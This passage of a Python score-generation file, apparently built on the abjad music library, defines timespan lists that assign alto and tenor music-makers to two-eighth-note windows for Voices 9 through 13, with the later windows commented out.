        # [(184, 8), (186, 8), alto_four_musicmaker_two],
        # [(186, 8), (188, 8), alto_four_musicmaker_two],
        # [(188, 8), (190, 8), alto_four_musicmaker_three],
        # [(190, 8), (192, 8), alto_four_musicmaker_two],
        #
        # [(192, 8), (194, 8), alto_four_musicmaker_three],
        # [(194, 8), (196, 8), alto_four_musicmaker_three],
        # [(196, 8), (198, 8), alto_four_musicmaker_three],
        # [(198, 8), (199, 8), alto_four_musicmaker_two],
    ]
])
# Timespans for Voice 9: two-bar (2/8-duration) spans from 0/8 through 104/8,
# each tagged with its music-maker. Entries from 104/8 to 199/8 are commented
# out — presumably the tail of the piece is disabled for now; TODO confirm
# before re-enabling. NOTE(review): Voice 9 <-> "alto five" pairing is
# inferred from variable names only — verify against the score setup.
voice_9_timespan_list: abjad.TimespanList = abjad.TimespanList([
    abjad.AnnotatedTimespan(
        start_offset=start_offset,
        stop_offset=stop_offset,
        annotation=MusicSpecifier(
            music_maker=music_maker,
            voice_name='Voice 9',
        ),
    )
    # Each entry: [start offset pair, stop offset pair, music-maker object].
    for start_offset, stop_offset, music_maker in [
        [(0, 8), (2, 8), alto_five_musicmaker_two],
        [(2, 8), (4, 8), alto_five_musicmaker_three],
        [(4, 8), (6, 8), alto_five_musicmaker_three],
        [(6, 8), (8, 8), alto_five_musicmaker_two],
        [(8, 8), (10, 8), alto_five_musicmaker_two],
        [(10, 8), (12, 8), alto_five_musicmaker_two],
        [(12, 8), (14, 8), alto_five_musicmaker_three],
        [(14, 8), (16, 8), alto_five_musicmaker_two],
        [(16, 8), (18, 8), alto_five_musicmaker_three],
        [(18, 8), (20, 8), alto_five_musicmaker_three],
        [(20, 8), (22, 8), alto_five_musicmaker_two],
        [(22, 8), (24, 8), alto_five_musicmaker_three],
        [(24, 8), (26, 8), alto_five_musicmaker_two],
        [(26, 8), (28, 8), alto_five_musicmaker_two],
        [(28, 8), (30, 8), alto_five_musicmaker_three],
        [(30, 8), (32, 8), alto_five_musicmaker_two],
        [(32, 8), (34, 8), alto_five_musicmaker_three],
        [(34, 8), (36, 8), alto_five_musicmaker_three],
        [(36, 8), (38, 8), alto_five_musicmaker_two],
        [(38, 8), (40, 8), alto_five_musicmaker_three],
        [(40, 8), (42, 8), alto_five_musicmaker_three],
        [(42, 8), (44, 8), alto_five_musicmaker_two],
        [(44, 8), (46, 8), alto_five_musicmaker_three],
        [(46, 8), (48, 8), alto_five_musicmaker_two],
        [(48, 8), (50, 8), alto_five_musicmaker_two],
        [(50, 8), (52, 8), alto_five_musicmaker_two],
        [(52, 8), (54, 8), alto_five_musicmaker_three],
        [(54, 8), (56, 8), alto_five_musicmaker_two],
        [(56, 8), (58, 8), alto_five_musicmaker_three],
        [(58, 8), (60, 8), alto_five_musicmaker_three],
        [(60, 8), (62, 8), alto_five_musicmaker_three],
        [(62, 8), (64, 8), alto_five_musicmaker_two],
        [(64, 8), (66, 8), alto_five_musicmaker_two],
        [(66, 8), (68, 8), alto_five_musicmaker_three],
        [(68, 8), (70, 8), alto_five_musicmaker_three],
        [(70, 8), (72, 8), alto_five_musicmaker_three],
        [(72, 8), (74, 8), alto_five_musicmaker_two],
        [(74, 8), (76, 8), alto_five_musicmaker_two],
        [(76, 8), (78, 8), alto_five_musicmaker_three],
        [(78, 8), (80, 8), alto_five_musicmaker_three],
        [(80, 8), (82, 8), alto_five_musicmaker_two],
        [(82, 8), (84, 8), alto_five_musicmaker_three],
        [(84, 8), (86, 8), alto_five_musicmaker_two],
        [(86, 8), (88, 8), alto_five_musicmaker_three],
        [(88, 8), (90, 8), alto_five_musicmaker_two],
        [(90, 8), (92, 8), alto_five_musicmaker_three],
        [(92, 8), (94, 8), alto_five_musicmaker_two],
        [(94, 8), (96, 8), alto_five_musicmaker_three],
        [(96, 8), (98, 8), alto_five_musicmaker_three],
        [(98, 8), (100, 8), alto_five_musicmaker_three],
        [(100, 8), (102, 8), alto_five_musicmaker_two],
        [(102, 8), (104, 8), alto_five_musicmaker_two],
        # Disabled continuation (104/8 .. 199/8) — see header note above.
        # [(104, 8), (106, 8), alto_five_musicmaker_two],
        # [(106, 8), (108, 8), alto_five_musicmaker_three],
        # [(108, 8), (110, 8), alto_five_musicmaker_two],
        # [(110, 8), (112, 8), alto_five_musicmaker_three],
        #
        # [(112, 8), (114, 8), alto_five_musicmaker_two],
        # [(114, 8), (116, 8), alto_five_musicmaker_three],
        # [(116, 8), (118, 8), alto_five_musicmaker_three],
        # [(118, 8), (120, 8), alto_five_musicmaker_two],
        #
        # [(120, 8), (122, 8), alto_five_musicmaker_three],
        # [(122, 8), (124, 8), alto_five_musicmaker_three],
        # [(124, 8), (126, 8), alto_five_musicmaker_two],
        # [(126, 8), (128, 8), alto_five_musicmaker_two],
        #
        # [(128, 8), (130, 8), alto_five_musicmaker_two],
        # [(130, 8), (132, 8), alto_five_musicmaker_two],
        # [(132, 8), (134, 8), alto_five_musicmaker_three],
        # [(134, 8), (136, 8), alto_five_musicmaker_three],
        # [(136, 8), (138, 8), alto_five_musicmaker_three],
        # [(138, 8), (140, 8), alto_five_musicmaker_two],
        # [(140, 8), (142, 8), alto_five_musicmaker_two],
        # [(142, 8), (144, 8), alto_five_musicmaker_three],
        # [(144, 8), (146, 8), alto_five_musicmaker_two],
        # [(146, 8), (148, 8), alto_five_musicmaker_three],
        # [(148, 8), (150, 8), alto_five_musicmaker_two],
        # [(150, 8), (152, 8), alto_five_musicmaker_three],
        #
        # [(152, 8), (154, 8), alto_five_musicmaker_two],
        # [(154, 8), (156, 8), alto_five_musicmaker_two],
        # [(156, 8), (158, 8), alto_five_musicmaker_two],
        # [(158, 8), (160, 8), alto_five_musicmaker_three],
        #
        # [(160, 8), (162, 8), alto_five_musicmaker_three],
        # [(162, 8), (164, 8), alto_five_musicmaker_two],
        # [(164, 8), (166, 8), alto_five_musicmaker_three],
        # [(166, 8), (168, 8), alto_five_musicmaker_three],
        #
        # [(168, 8), (170, 8), alto_five_musicmaker_three],
        # [(170, 8), (172, 8), alto_five_musicmaker_two],
        # [(172, 8), (174, 8), alto_five_musicmaker_two],
        # [(174, 8), (176, 8), alto_five_musicmaker_two],
        #
        # [(176, 8), (178, 8), alto_five_musicmaker_two],
        # [(178, 8), (180, 8), alto_five_musicmaker_three],
        # [(180, 8), (182, 8), alto_five_musicmaker_two],
        # [(182, 8), (184, 8), alto_five_musicmaker_two],
        #
        # [(184, 8), (186, 8), alto_five_musicmaker_three],
        # [(186, 8), (188, 8), alto_five_musicmaker_two],
        # [(188, 8), (190, 8), alto_five_musicmaker_three],
        # [(190, 8), (192, 8), alto_five_musicmaker_three],
        #
        # [(192, 8), (194, 8), alto_five_musicmaker_two],
        # [(194, 8), (196, 8), alto_five_musicmaker_three],
        # [(196, 8), (198, 8), alto_five_musicmaker_two],
        # [(198, 8), (199, 8), alto_five_musicmaker_two],
    ]
])
# Voice 10: one AnnotatedTimespan per two-eighth-note window, each carrying a
# MusicSpecifier that names which alto-six music-maker is active in that
# window.  Windows tile [0/8, 104/8) contiguously; the remainder of the piece
# (through 199/8) is present but currently disabled (commented out).
voice_10_timespan_list = abjad.TimespanList([
    abjad.AnnotatedTimespan(
        start_offset=start_offset,
        stop_offset=stop_offset,
        annotation=MusicSpecifier(
            music_maker=music_maker,
            voice_name='Voice 10',
        ),
    )
    for start_offset, stop_offset, music_maker in [
        [(0, 8), (2, 8), alto_six_musicmaker_three],
        [(2, 8), (4, 8), alto_six_musicmaker_three],
        [(4, 8), (6, 8), alto_six_musicmaker_two],
        [(6, 8), (8, 8), alto_six_musicmaker_three],
        [(8, 8), (10, 8), alto_six_musicmaker_two],
        [(10, 8), (12, 8), alto_six_musicmaker_two],
        [(12, 8), (14, 8), alto_six_musicmaker_three],
        [(14, 8), (16, 8), alto_six_musicmaker_two],
        [(16, 8), (18, 8), alto_six_musicmaker_three],
        [(18, 8), (20, 8), alto_six_musicmaker_two],
        [(20, 8), (22, 8), alto_six_musicmaker_three],
        [(22, 8), (24, 8), alto_six_musicmaker_two],
        [(24, 8), (26, 8), alto_six_musicmaker_three],
        [(26, 8), (28, 8), alto_six_musicmaker_two],
        [(28, 8), (30, 8), alto_six_musicmaker_three],
        [(30, 8), (32, 8), alto_six_musicmaker_two],
        [(32, 8), (34, 8), alto_six_musicmaker_two],
        [(34, 8), (36, 8), alto_six_musicmaker_two],
        [(36, 8), (38, 8), alto_six_musicmaker_three],
        [(38, 8), (40, 8), alto_six_musicmaker_three],
        [(40, 8), (42, 8), alto_six_musicmaker_three],
        [(42, 8), (44, 8), alto_six_musicmaker_two],
        [(44, 8), (46, 8), alto_six_musicmaker_three],
        [(46, 8), (48, 8), alto_six_musicmaker_three],
        [(48, 8), (50, 8), alto_six_musicmaker_three],
        [(50, 8), (52, 8), alto_six_musicmaker_two],
        [(52, 8), (54, 8), alto_six_musicmaker_two],
        [(54, 8), (56, 8), alto_six_musicmaker_two],
        [(56, 8), (58, 8), alto_six_musicmaker_two],
        [(58, 8), (60, 8), alto_six_musicmaker_two],
        [(60, 8), (62, 8), alto_six_musicmaker_three],
        [(62, 8), (64, 8), alto_six_musicmaker_two],
        [(64, 8), (66, 8), alto_six_musicmaker_two],
        [(66, 8), (68, 8), alto_six_musicmaker_three],
        [(68, 8), (70, 8), alto_six_musicmaker_two],
        [(70, 8), (72, 8), alto_six_musicmaker_three],
        [(72, 8), (74, 8), alto_six_musicmaker_three],
        [(74, 8), (76, 8), alto_six_musicmaker_two],
        [(76, 8), (78, 8), alto_six_musicmaker_three],
        [(78, 8), (80, 8), alto_six_musicmaker_two],
        [(80, 8), (82, 8), alto_six_musicmaker_two],
        [(82, 8), (84, 8), alto_six_musicmaker_two],
        [(84, 8), (86, 8), alto_six_musicmaker_three],
        [(86, 8), (88, 8), alto_six_musicmaker_two],
        [(88, 8), (90, 8), alto_six_musicmaker_three],
        [(90, 8), (92, 8), alto_six_musicmaker_three],
        [(92, 8), (94, 8), alto_six_musicmaker_two],
        [(94, 8), (96, 8), alto_six_musicmaker_three],
        [(96, 8), (98, 8), alto_six_musicmaker_two],
        [(98, 8), (100, 8), alto_six_musicmaker_two],
        [(100, 8), (102, 8), alto_six_musicmaker_two],
        [(102, 8), (104, 8), alto_six_musicmaker_three],
        # Windows from (104, 8) through (199, 8) are currently disabled:
        # [(104, 8), (106, 8), alto_six_musicmaker_three],
        # [(106, 8), (108, 8), alto_six_musicmaker_three],
        # [(108, 8), (110, 8), alto_six_musicmaker_two],
        # [(110, 8), (112, 8), alto_six_musicmaker_two],
        #
        # [(112, 8), (114, 8), alto_six_musicmaker_three],
        # [(114, 8), (116, 8), alto_six_musicmaker_three],
        # [(116, 8), (118, 8), alto_six_musicmaker_two],
        # [(118, 8), (120, 8), alto_six_musicmaker_two],
        #
        # [(120, 8), (122, 8), alto_six_musicmaker_two],
        # [(122, 8), (124, 8), alto_six_musicmaker_three],
        # [(124, 8), (126, 8), alto_six_musicmaker_two],
        # [(126, 8), (128, 8), alto_six_musicmaker_three],
        #
        # [(128, 8), (130, 8), alto_six_musicmaker_three],
        # [(130, 8), (132, 8), alto_six_musicmaker_two],
        # [(132, 8), (134, 8), alto_six_musicmaker_three],
        # [(134, 8), (136, 8), alto_six_musicmaker_two],
        # [(136, 8), (138, 8), alto_six_musicmaker_two],
        # [(138, 8), (140, 8), alto_six_musicmaker_three],
        # [(140, 8), (142, 8), alto_six_musicmaker_two],
        # [(142, 8), (144, 8), alto_six_musicmaker_two],
        #
        # [(144, 8), (146, 8), alto_six_musicmaker_three],
        # [(146, 8), (148, 8), alto_six_musicmaker_two],
        # [(148, 8), (150, 8), alto_six_musicmaker_two],
        # [(150, 8), (152, 8), alto_six_musicmaker_three],
        #
        # [(152, 8), (154, 8), alto_six_musicmaker_two],
        # [(154, 8), (156, 8), alto_six_musicmaker_three],
        # [(156, 8), (158, 8), alto_six_musicmaker_two],
        # [(158, 8), (160, 8), alto_six_musicmaker_three],
        #
        # [(160, 8), (162, 8), alto_six_musicmaker_two],
        # [(162, 8), (164, 8), alto_six_musicmaker_two],
        # [(164, 8), (166, 8), alto_six_musicmaker_three],
        # [(166, 8), (168, 8), alto_six_musicmaker_three],
        #
        # [(168, 8), (170, 8), alto_six_musicmaker_two],
        # [(170, 8), (172, 8), alto_six_musicmaker_two],
        # [(172, 8), (174, 8), alto_six_musicmaker_three],
        # [(174, 8), (176, 8), alto_six_musicmaker_three],
        #
        # [(176, 8), (178, 8), alto_six_musicmaker_three],
        # [(178, 8), (180, 8), alto_six_musicmaker_two],
        # [(180, 8), (182, 8), alto_six_musicmaker_three],
        # [(182, 8), (184, 8), alto_six_musicmaker_two],
        #
        # [(184, 8), (186, 8), alto_six_musicmaker_two],
        # [(186, 8), (188, 8), alto_six_musicmaker_two],
        # [(188, 8), (190, 8), alto_six_musicmaker_three],
        # [(190, 8), (192, 8), alto_six_musicmaker_three],
        #
        # [(192, 8), (194, 8), alto_six_musicmaker_three],
        # [(194, 8), (196, 8), alto_six_musicmaker_three],
        # [(196, 8), (198, 8), alto_six_musicmaker_two],
        # [(198, 8), (199, 8), alto_six_musicmaker_two],
    ]
])
# Voice 11: one AnnotatedTimespan per two-eighth-note window, each carrying a
# MusicSpecifier that names which tenor-one music-maker is active in that
# window.  Windows tile [0/8, 104/8) contiguously; the remainder of the piece
# (through 199/8) is present but currently disabled (commented out).
voice_11_timespan_list = abjad.TimespanList([
    abjad.AnnotatedTimespan(
        start_offset=start_offset,
        stop_offset=stop_offset,
        annotation=MusicSpecifier(
            music_maker=music_maker,
            voice_name='Voice 11',
        ),
    )
    for start_offset, stop_offset, music_maker in [
        [(0, 8), (2, 8), tenor_one_musicmaker_three],
        [(2, 8), (4, 8), tenor_one_musicmaker_three],
        [(4, 8), (6, 8), tenor_one_musicmaker_two],
        [(6, 8), (8, 8), tenor_one_musicmaker_two],
        [(8, 8), (10, 8), tenor_one_musicmaker_two],
        [(10, 8), (12, 8), tenor_one_musicmaker_three],
        [(12, 8), (14, 8), tenor_one_musicmaker_three],
        [(14, 8), (16, 8), tenor_one_musicmaker_three],
        [(16, 8), (18, 8), tenor_one_musicmaker_three],
        [(18, 8), (20, 8), tenor_one_musicmaker_two],
        [(20, 8), (22, 8), tenor_one_musicmaker_two],
        [(22, 8), (24, 8), tenor_one_musicmaker_two],
        [(24, 8), (26, 8), tenor_one_musicmaker_two],
        [(26, 8), (28, 8), tenor_one_musicmaker_three],
        [(28, 8), (30, 8), tenor_one_musicmaker_three],
        [(30, 8), (32, 8), tenor_one_musicmaker_three],
        [(32, 8), (34, 8), tenor_one_musicmaker_three],
        [(34, 8), (36, 8), tenor_one_musicmaker_three],
        [(36, 8), (38, 8), tenor_one_musicmaker_two],
        [(38, 8), (40, 8), tenor_one_musicmaker_two],
        [(40, 8), (42, 8), tenor_one_musicmaker_two],
        [(42, 8), (44, 8), tenor_one_musicmaker_two],
        [(44, 8), (46, 8), tenor_one_musicmaker_three],
        [(46, 8), (48, 8), tenor_one_musicmaker_three],
        [(48, 8), (50, 8), tenor_one_musicmaker_three],
        [(50, 8), (52, 8), tenor_one_musicmaker_three],
        [(52, 8), (54, 8), tenor_one_musicmaker_two],
        [(54, 8), (56, 8), tenor_one_musicmaker_two],
        [(56, 8), (58, 8), tenor_one_musicmaker_two],
        [(58, 8), (60, 8), tenor_one_musicmaker_three],
        [(60, 8), (62, 8), tenor_one_musicmaker_three],
        [(62, 8), (64, 8), tenor_one_musicmaker_three],
        [(64, 8), (66, 8), tenor_one_musicmaker_two],
        [(66, 8), (68, 8), tenor_one_musicmaker_two],
        [(68, 8), (70, 8), tenor_one_musicmaker_three],
        [(70, 8), (72, 8), tenor_one_musicmaker_two],
        [(72, 8), (74, 8), tenor_one_musicmaker_two],
        [(74, 8), (76, 8), tenor_one_musicmaker_two],
        [(76, 8), (78, 8), tenor_one_musicmaker_three],
        [(78, 8), (80, 8), tenor_one_musicmaker_three],
        [(80, 8), (82, 8), tenor_one_musicmaker_three],
        [(82, 8), (84, 8), tenor_one_musicmaker_three],
        [(84, 8), (86, 8), tenor_one_musicmaker_two],
        [(86, 8), (88, 8), tenor_one_musicmaker_two],
        [(88, 8), (90, 8), tenor_one_musicmaker_two],
        [(90, 8), (92, 8), tenor_one_musicmaker_two],
        [(92, 8), (94, 8), tenor_one_musicmaker_two],
        [(94, 8), (96, 8), tenor_one_musicmaker_two],
        [(96, 8), (98, 8), tenor_one_musicmaker_two],
        [(98, 8), (100, 8), tenor_one_musicmaker_three],
        [(100, 8), (102, 8), tenor_one_musicmaker_three],
        [(102, 8), (104, 8), tenor_one_musicmaker_three],
        # Windows from (104, 8) through (199, 8) are currently disabled:
        # [(104, 8), (106, 8), tenor_one_musicmaker_three],
        # [(106, 8), (108, 8), tenor_one_musicmaker_three],
        # [(108, 8), (110, 8), tenor_one_musicmaker_three],
        # [(110, 8), (112, 8), tenor_one_musicmaker_three],
        # [(112, 8), (114, 8), tenor_one_musicmaker_two],
        # [(114, 8), (116, 8), tenor_one_musicmaker_two],
        # [(116, 8), (118, 8), tenor_one_musicmaker_two],
        # [(118, 8), (120, 8), tenor_one_musicmaker_two],
        # [(120, 8), (122, 8), tenor_one_musicmaker_two],
        # [(122, 8), (124, 8), tenor_one_musicmaker_three],
        # [(124, 8), (126, 8), tenor_one_musicmaker_three],
        # [(126, 8), (128, 8), tenor_one_musicmaker_three],
        # [(128, 8), (130, 8), tenor_one_musicmaker_three],
        # [(130, 8), (132, 8), tenor_one_musicmaker_three],
        # [(132, 8), (134, 8), tenor_one_musicmaker_three],
        # [(134, 8), (136, 8), tenor_one_musicmaker_two],
        # [(136, 8), (138, 8), tenor_one_musicmaker_two],
        # [(138, 8), (140, 8), tenor_one_musicmaker_two],
        # [(140, 8), (142, 8), tenor_one_musicmaker_two],
        # [(142, 8), (144, 8), tenor_one_musicmaker_two],
        # [(144, 8), (146, 8), tenor_one_musicmaker_two],
        # [(146, 8), (148, 8), tenor_one_musicmaker_two],
        # [(148, 8), (150, 8), tenor_one_musicmaker_three],
        # [(150, 8), (152, 8), tenor_one_musicmaker_three],
        # [(152, 8), (154, 8), tenor_one_musicmaker_three],
        # [(154, 8), (156, 8), tenor_one_musicmaker_three],
        # [(156, 8), (158, 8), tenor_one_musicmaker_two],
        # [(158, 8), (160, 8), tenor_one_musicmaker_two],
        # [(160, 8), (162, 8), tenor_one_musicmaker_two],
        # [(162, 8), (164, 8), tenor_one_musicmaker_two],
        # [(164, 8), (166, 8), tenor_one_musicmaker_three],
        # [(166, 8), (168, 8), tenor_one_musicmaker_three],
        # [(168, 8), (170, 8), tenor_one_musicmaker_three],
        # [(170, 8), (172, 8), tenor_one_musicmaker_three],
        # [(172, 8), (174, 8), tenor_one_musicmaker_three],
        # [(174, 8), (176, 8), tenor_one_musicmaker_two],
        # [(176, 8), (178, 8), tenor_one_musicmaker_two],
        # [(178, 8), (180, 8), tenor_one_musicmaker_two],
        # [(180, 8), (182, 8), tenor_one_musicmaker_two],
        # [(182, 8), (184, 8), tenor_one_musicmaker_two],
        # [(184, 8), (186, 8), tenor_one_musicmaker_two],
        # [(186, 8), (188, 8), tenor_one_musicmaker_two],
        # [(188, 8), (190, 8), tenor_one_musicmaker_three],
        # [(190, 8), (192, 8), tenor_one_musicmaker_three],
        # [(192, 8), (194, 8), tenor_one_musicmaker_three],
        # [(194, 8), (196, 8), tenor_one_musicmaker_three],
        # [(196, 8), (198, 8), tenor_one_musicmaker_three],
        # [(198, 8), (199, 8), tenor_one_musicmaker_two],
    ]
])
# Voice 12: one AnnotatedTimespan per two-eighth-note window, each carrying a
# MusicSpecifier that names which tenor-two music-maker is active in that
# window.  Windows tile [0/8, 104/8) contiguously; the remainder of the piece
# (through 199/8) is present but currently disabled (commented out).
voice_12_timespan_list = abjad.TimespanList([
    abjad.AnnotatedTimespan(
        start_offset=start_offset,
        stop_offset=stop_offset,
        annotation=MusicSpecifier(
            music_maker=music_maker,
            voice_name='Voice 12',
        ),
    )
    for start_offset, stop_offset, music_maker in [
        [(0, 8), (2, 8), tenor_two_musicmaker_two],
        [(2, 8), (4, 8), tenor_two_musicmaker_three],
        [(4, 8), (6, 8), tenor_two_musicmaker_three],
        [(6, 8), (8, 8), tenor_two_musicmaker_three],
        [(8, 8), (10, 8), tenor_two_musicmaker_three],
        [(10, 8), (12, 8), tenor_two_musicmaker_three],
        [(12, 8), (14, 8), tenor_two_musicmaker_three],
        [(14, 8), (16, 8), tenor_two_musicmaker_two],
        [(16, 8), (18, 8), tenor_two_musicmaker_two],
        [(18, 8), (20, 8), tenor_two_musicmaker_two],
        [(20, 8), (22, 8), tenor_two_musicmaker_two],
        [(22, 8), (24, 8), tenor_two_musicmaker_two],
        [(24, 8), (26, 8), tenor_two_musicmaker_two],
        [(26, 8), (28, 8), tenor_two_musicmaker_two],
        [(28, 8), (30, 8), tenor_two_musicmaker_three],
        [(30, 8), (32, 8), tenor_two_musicmaker_three],
        [(32, 8), (34, 8), tenor_two_musicmaker_three],
        [(34, 8), (36, 8), tenor_two_musicmaker_three],
        [(36, 8), (38, 8), tenor_two_musicmaker_three],
        [(38, 8), (40, 8), tenor_two_musicmaker_three],
        [(40, 8), (42, 8), tenor_two_musicmaker_three],
        [(42, 8), (44, 8), tenor_two_musicmaker_two],
        [(44, 8), (46, 8), tenor_two_musicmaker_two],
        [(46, 8), (48, 8), tenor_two_musicmaker_two],
        [(48, 8), (50, 8), tenor_two_musicmaker_three],
        [(50, 8), (52, 8), tenor_two_musicmaker_three],
        [(52, 8), (54, 8), tenor_two_musicmaker_two],
        [(54, 8), (56, 8), tenor_two_musicmaker_two],
        [(56, 8), (58, 8), tenor_two_musicmaker_two],
        [(58, 8), (60, 8), tenor_two_musicmaker_two],
        [(60, 8), (62, 8), tenor_two_musicmaker_two],
        [(62, 8), (64, 8), tenor_two_musicmaker_three],
        [(64, 8), (66, 8), tenor_two_musicmaker_three],
        [(66, 8), (68, 8), tenor_two_musicmaker_three],
        [(68, 8), (70, 8), tenor_two_musicmaker_three],
        [(70, 8), (72, 8), tenor_two_musicmaker_three],
        [(72, 8), (74, 8), tenor_two_musicmaker_two],
        [(74, 8), (76, 8), tenor_two_musicmaker_two],
        [(76, 8), (78, 8), tenor_two_musicmaker_two],
        [(78, 8), (80, 8), tenor_two_musicmaker_two],
        [(80, 8), (82, 8), tenor_two_musicmaker_two],
        [(82, 8), (84, 8), tenor_two_musicmaker_two],
        [(84, 8), (86, 8), tenor_two_musicmaker_two],
        [(86, 8), (88, 8), tenor_two_musicmaker_three],
        [(88, 8), (90, 8), tenor_two_musicmaker_three],
        [(90, 8), (92, 8), tenor_two_musicmaker_three],
        [(92, 8), (94, 8), tenor_two_musicmaker_three],
        [(94, 8), (96, 8), tenor_two_musicmaker_three],
        [(96, 8), (98, 8), tenor_two_musicmaker_three],
        [(98, 8), (100, 8), tenor_two_musicmaker_two],
        [(100, 8), (102, 8), tenor_two_musicmaker_two],
        [(102, 8), (104, 8), tenor_two_musicmaker_two],
        # Windows from (104, 8) through (199, 8) are currently disabled:
        # [(104, 8), (106, 8), tenor_two_musicmaker_two],
        # [(106, 8), (108, 8), tenor_two_musicmaker_three],
        # [(108, 8), (110, 8), tenor_two_musicmaker_three],
        # [(110, 8), (112, 8), tenor_two_musicmaker_three],
        # [(112, 8), (114, 8), tenor_two_musicmaker_three],
        # [(114, 8), (116, 8), tenor_two_musicmaker_two],
        # [(116, 8), (118, 8), tenor_two_musicmaker_two],
        # [(118, 8), (120, 8), tenor_two_musicmaker_two],
        # [(120, 8), (122, 8), tenor_two_musicmaker_three],
        # [(122, 8), (124, 8), tenor_two_musicmaker_three],
        # [(124, 8), (126, 8), tenor_two_musicmaker_three],
        # [(126, 8), (128, 8), tenor_two_musicmaker_three],
        # [(128, 8), (130, 8), tenor_two_musicmaker_two],
        # [(130, 8), (132, 8), tenor_two_musicmaker_two],
        # [(132, 8), (134, 8), tenor_two_musicmaker_two],
        # [(134, 8), (136, 8), tenor_two_musicmaker_two],
        # [(136, 8), (138, 8), tenor_two_musicmaker_two],
        # [(138, 8), (140, 8), tenor_two_musicmaker_two],
        # [(140, 8), (142, 8), tenor_two_musicmaker_two],
        # [(142, 8), (144, 8), tenor_two_musicmaker_three],
        # [(144, 8), (146, 8), tenor_two_musicmaker_three],
        # [(146, 8), (148, 8), tenor_two_musicmaker_three],
        # [(148, 8), (150, 8), tenor_two_musicmaker_three],
        # [(150, 8), (152, 8), tenor_two_musicmaker_three],
        # [(152, 8), (154, 8), tenor_two_musicmaker_three],
        # [(154, 8), (156, 8), tenor_two_musicmaker_two],
        # [(156, 8), (158, 8), tenor_two_musicmaker_two],
        # [(158, 8), (160, 8), tenor_two_musicmaker_two],
        # [(160, 8), (162, 8), tenor_two_musicmaker_two],
        # [(162, 8), (164, 8), tenor_two_musicmaker_three],
        # [(164, 8), (166, 8), tenor_two_musicmaker_three],
        # [(166, 8), (168, 8), tenor_two_musicmaker_two],
        # [(168, 8), (170, 8), tenor_two_musicmaker_three],
        # [(170, 8), (172, 8), tenor_two_musicmaker_three],
        # [(172, 8), (174, 8), tenor_two_musicmaker_three],
        # [(174, 8), (176, 8), tenor_two_musicmaker_two],
        # [(176, 8), (178, 8), tenor_two_musicmaker_two],
        # [(178, 8), (180, 8), tenor_two_musicmaker_two],
        # [(180, 8), (182, 8), tenor_two_musicmaker_three],
        # [(182, 8), (184, 8), tenor_two_musicmaker_three],
        # [(184, 8), (186, 8), tenor_two_musicmaker_three],
        # [(186, 8), (188, 8), tenor_two_musicmaker_two],
        # [(188, 8), (190, 8), tenor_two_musicmaker_two],
        # [(190, 8), (192, 8), tenor_two_musicmaker_two],
        # [(192, 8), (194, 8), tenor_two_musicmaker_three],
        # [(194, 8), (196, 8), tenor_two_musicmaker_three],
        # [(196, 8), (198, 8), tenor_two_musicmaker_three],
        # [(198, 8), (199, 8), tenor_two_musicmaker_three],
    ]
])
# Voice 13: one AnnotatedTimespan per two-eighth-note window, each carrying a
# MusicSpecifier that names which tenor-three music-maker is active in that
# window.  Windows tile [0/8, 104/8) contiguously; the remainder of the piece
# (through 199/8) is present but currently disabled (commented out).
voice_13_timespan_list = abjad.TimespanList([
    abjad.AnnotatedTimespan(
        start_offset=start_offset,
        stop_offset=stop_offset,
        annotation=MusicSpecifier(
            music_maker=music_maker,
            voice_name='Voice 13',
        ),
    )
    for start_offset, stop_offset, music_maker in [
        [(0, 8), (2, 8), tenor_three_musicmaker_three],
        [(2, 8), (4, 8), tenor_three_musicmaker_three],
        [(4, 8), (6, 8), tenor_three_musicmaker_three],
        [(6, 8), (8, 8), tenor_three_musicmaker_three],
        [(8, 8), (10, 8), tenor_three_musicmaker_three],
        [(10, 8), (12, 8), tenor_three_musicmaker_three],
        [(12, 8), (14, 8), tenor_three_musicmaker_two],
        [(14, 8), (16, 8), tenor_three_musicmaker_two],
        [(16, 8), (18, 8), tenor_three_musicmaker_two],
        [(18, 8), (20, 8), tenor_three_musicmaker_two],
        [(20, 8), (22, 8), tenor_three_musicmaker_two],
        [(22, 8), (24, 8), tenor_three_musicmaker_two],
        [(24, 8), (26, 8), tenor_three_musicmaker_three],
        [(26, 8), (28, 8), tenor_three_musicmaker_three],
        [(28, 8), (30, 8), tenor_three_musicmaker_three],
        [(30, 8), (32, 8), tenor_three_musicmaker_two],
        [(32, 8), (34, 8), tenor_three_musicmaker_two],
        [(34, 8), (36, 8), tenor_three_musicmaker_two],
        [(36, 8), (38, 8), tenor_three_musicmaker_two],
        [(38, 8), (40, 8), tenor_three_musicmaker_three],
        [(40, 8), (42, 8), tenor_three_musicmaker_three],
        [(42, 8), (44, 8), tenor_three_musicmaker_three],
        [(44, 8), (46, 8), tenor_three_musicmaker_three],
        [(46, 8), (48, 8), tenor_three_musicmaker_three],
        [(48, 8), (50, 8), tenor_three_musicmaker_three],
        [(50, 8), (52, 8), tenor_three_musicmaker_three],
        [(52, 8), (54, 8), tenor_three_musicmaker_two],
        [(54, 8), (56, 8), tenor_three_musicmaker_two],
        [(56, 8), (58, 8), tenor_three_musicmaker_two],
        [(58, 8), (60, 8), tenor_three_musicmaker_two],
        [(60, 8), (62, 8), tenor_three_musicmaker_two],
        [(62, 8), (64, 8), tenor_three_musicmaker_three],
        [(64, 8), (66, 8), tenor_three_musicmaker_three],
        [(66, 8), (68, 8), tenor_three_musicmaker_three],
        [(68, 8), (70, 8), tenor_three_musicmaker_three],
        [(70, 8), (72, 8), tenor_three_musicmaker_three],
        [(72, 8), (74, 8), tenor_three_musicmaker_two],
        [(74, 8), (76, 8), tenor_three_musicmaker_two],
        [(76, 8), (78, 8), tenor_three_musicmaker_two],
        [(78, 8), (80, 8), tenor_three_musicmaker_two],
        [(80, 8), (82, 8), tenor_three_musicmaker_two],
        [(82, 8), (84, 8), tenor_three_musicmaker_two],
        [(84, 8), (86, 8), tenor_three_musicmaker_two],
        [(86, 8), (88, 8), tenor_three_musicmaker_three],
        [(88, 8), (90, 8), tenor_three_musicmaker_three],
        [(90, 8), (92, 8), tenor_three_musicmaker_three],
        [(92, 8), (94, 8), tenor_three_musicmaker_three],
        [(94, 8), (96, 8), tenor_three_musicmaker_two],
        [(96, 8), (98, 8), tenor_three_musicmaker_two],
        [(98, 8), (100, 8), tenor_three_musicmaker_two],
        [(100, 8), (102, 8), tenor_three_musicmaker_two],
        [(102, 8), (104, 8), tenor_three_musicmaker_two],
        # Windows from (104, 8) through (199, 8) are currently disabled:
        # [(104, 8), (106, 8), tenor_three_musicmaker_three],
        # [(106, 8), (108, 8), tenor_three_musicmaker_three],
        # [(108, 8), (110, 8), tenor_three_musicmaker_three],
        # [(110, 8), (112, 8), tenor_three_musicmaker_three],
